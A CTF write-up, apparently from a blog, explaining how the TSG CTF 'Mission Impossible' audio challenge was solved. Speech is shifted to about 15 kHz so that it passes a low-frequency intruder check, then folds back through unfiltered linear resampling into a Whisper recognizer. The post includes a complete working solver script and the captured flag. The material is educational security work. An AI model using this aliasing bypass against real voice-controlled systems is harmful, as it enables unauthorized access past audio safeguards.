Challenge Details

Category: Misc / Signal Processing / Audio

Description:
The security system of CIA vault room is state-of-the-art.
There are a large number of pressure-sensitive, temperature-sensitive and audio-sensitive sensors.
And the terminal is operated by voice recognition.

Files Provided:

❯ tree .
.
├── Dockerfile
└── src
    └── server.py

Goal: Bypass a frequency-based security system to issue a voice command to a neural network.

Solution

1. Challenge Overview

We are presented with a "state-of-the-art" voice-controlled vault. The system listens for audio commands but has strict security measures:

Intruder Detector: It analyzes the audio spectrum. If it detects any sound energy in the human hearing range (0 Hz – 10,000 Hz), it triggers an alarm.
Voice Recognition: If the alarm isn't triggered, the audio is passed to OpenAI's Whisper model to check for the passphrase: "Give me the flag".

The Paradox: We need to send a voice command (which naturally exists between 85 Hz and 255 Hz) without creating any sound energy below 10,000 Hz.

2. Analyzing the Source Code (`server.py`)

There are two critical functions in the server code that reveal the vulnerability.

The Guard: `detect_intruder`

def detect_intruder(freq_space, sr):
    # Zeroes out everything ABOVE 10,000 Hz
    cut_high_freqs(freq_space, sr, 10000) 

    # Checks if anything remains BELOW 10,000 Hz
    magnitude = np.abs(freq_space).max()
    return magnitude > 0

This function acts as a Low-Pass Filter. It deletes high frequencies and checks the remaining low frequencies. If our audio has silence in the 0–10kHz range, we pass this check.

The Listener: `recognize`

# ... Intruder check passed ...

# Resample to 16,000 Hz for Whisper
wave = librosa.resample(wave, orig_sr=sr, target_sr=WHISPER_SR, res_type="linear")
result = whisper.transcribe(model, wave)["text"]

This is the flaw. The server uses librosa.resample with res_type="linear". Linear interpolation is fast, but it lacks a proper anti-aliasing filter.

If you feed a signal with frequencies higher than the Nyquist frequency (half the sample rate) into a resampler without filtering, those high frequencies "fold back" (alias) and appear as low frequencies.

3. The Vulnerability: Spectral Aliasing

Aliasing is a phenomenon where different signals become indistinguishable when sampled.

The target sample rate is 16,000 Hz.
This means the "Nyquist Limit" is 8,000 Hz.
Any frequency f entered into this system will appear as f if f < 8000.
However, if we input a frequency f near 16,000 Hz, the sampler essentially "misses" the cycles and interprets it as a low frequency.

The Math: If we sample a signal at F_s = 16000 Hz, a high-frequency input at F_in = 16000 - x Hz will look exactly like a low-frequency signal at x Hz.

The Plan:

Take the voice command ("Give me the flag"), which is at ~1 kHz.
Shift it up to ~15 kHz using Amplitude Modulation.
The Guard (Intruder Detector): Sees 15 kHz. It ignores everything above 10 kHz. It sees silence. PASS.
The Listener (Whisper): Resamples the 15 kHz signal at 16 kHz. Due to aliasing, the 15 kHz signal folds back down to 1 kHz. Whisper hears the voice clearly.

4. The Final Script

import numpy as np
import librosa
import scipy.signal
from scipy.io import wavfile
from gtts import gTTS
from gradio_client import Client, handle_file
import os

# Helper to remove high frequencies (clean input)
def butter_lowpass_filter(data, cutoff, fs, order=5):
    nyq = 0.5 * fs
    b, a = scipy.signal.butter(order, cutoff / nyq, btype='low', analog=False)
    return scipy.signal.filtfilt(b, a, data)

# Helper to remove low frequencies (clean output)
def butter_highpass_filter(data, cutoff, fs, order=5):
    nyq = 0.5 * fs
    b, a = scipy.signal.butter(order, cutoff / nyq, btype='high', analog=False)
    return scipy.signal.filtfilt(b, a, data)

def solve():
    # 1. Generate Voice Command
    print("[*] Generating TTS...")
    tts = gTTS("give me the flag")
    tts.save("base.mp3")

    # 2. Preparation
    # We use 48kHz to give us enough "room" to shift frequencies up
    target_sr = 48000
    y, sr = librosa.load("base.mp3", sr=target_sr)
    y = y[:int(4.5 * target_sr)] # Trim duration

    # 3. Clean the Source
    # Filter out anything above 3kHz in the voice so it doesn't leak later
    y_clean = butter_lowpass_filter(y, 3000, target_sr, order=6)

    # 4. Modulation (The Magic Trick)
    # Shift the 0-3kHz voice up to 13-19kHz range
    t = np.arange(len(y_clean)) / target_sr
    carrier = np.cos(2 * np.pi * 16000 * t)
    y_mod = y_clean * carrier

    # 5. Safety Firewall
    # Delete anything below 11kHz to ensure we bypass the intruder detector
    y_final = butter_highpass_filter(y_mod, 11000, target_sr, order=6)

    # 6. Anti-Click Fading
    # Smooth the start and end to prevent "pop" noises that trigger alarms
    fade_len = int(0.1 * target_sr)
    fade_in = np.linspace(0, 1, fade_len)
    fade_out = np.linspace(1, 0, fade_len)
    y_final[:fade_len] *= fade_in
    y_final[-fade_len:] *= fade_out

    # 7. Save and Send
    y_int16 = (y_final / np.max(np.abs(y_final)) * 32767).astype(np.int16)
    wavfile.write("payload.wav", target_sr, y_int16)

    print("[*] Sending payload...")
    client = Client("http://35.194.98.181:57860/")
    result = client.predict(audio=handle_file("payload.wav"), api_name="/predict")
    print(result)

if __name__ == "__main__":
    solve()

Output:

 ❯ python3 solver2.py
[*] Generating base audio...
[*] Applying Low-pass filter (3kHz)...
[*] Modulating with 16kHz carrier...
[*] Applying High-pass filter (11kHz)...
[*] Payload saved to robust_solution.wav
[*] Sending payload to CIA Vault Terminal...
Loaded as API: http://35.194.98.181:57860/

[+] Server Response:
OK, here is the flag: TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

Final Flag

TSGCTF{Th1S_fl4g_wiLL_s3lf-deSTrucT_in_5_s3c0nds}

Mission Impossible TSG CTF Writeup: Bypassing Audio Security with Spectral Aliasing

Challenge Details

Solution

1. Challenge Overview

2. Analyzing the Source Code (`server.py`)

The Guard: `detect_intruder`

The Listener: `recognize`

3. The Vulnerability: Spectral Aliasing

4. The Final Script

Final Flag

Comments

More from this blog

Bits Krieg CTF: Cider Vault Solution & Linux Heap Exploitation Guide

Solving LACTF Lazy Bigrams: Phonetic Bigram Substitution Challenge

Solve LACTF Tic-Tac-No Challenge: OOB Write Exploit Guide

Custom Packaging CTF Writeup: Decrypting the Custom KCF Container

Trust Issues CTF Writeup: AWS IAM Privilege Escalation

Command Palette

Challenge Details

Solution

1. Challenge Overview

2. Analyzing the Source Code (server.py)

The Guard: detect_intruder

The Listener: recognize

3. The Vulnerability: Spectral Aliasing

4. The Final Script

Final Flag

Comments

More from this blog

2. Analyzing the Source Code (`server.py`)

The Guard: `detect_intruder`

The Listener: `recognize`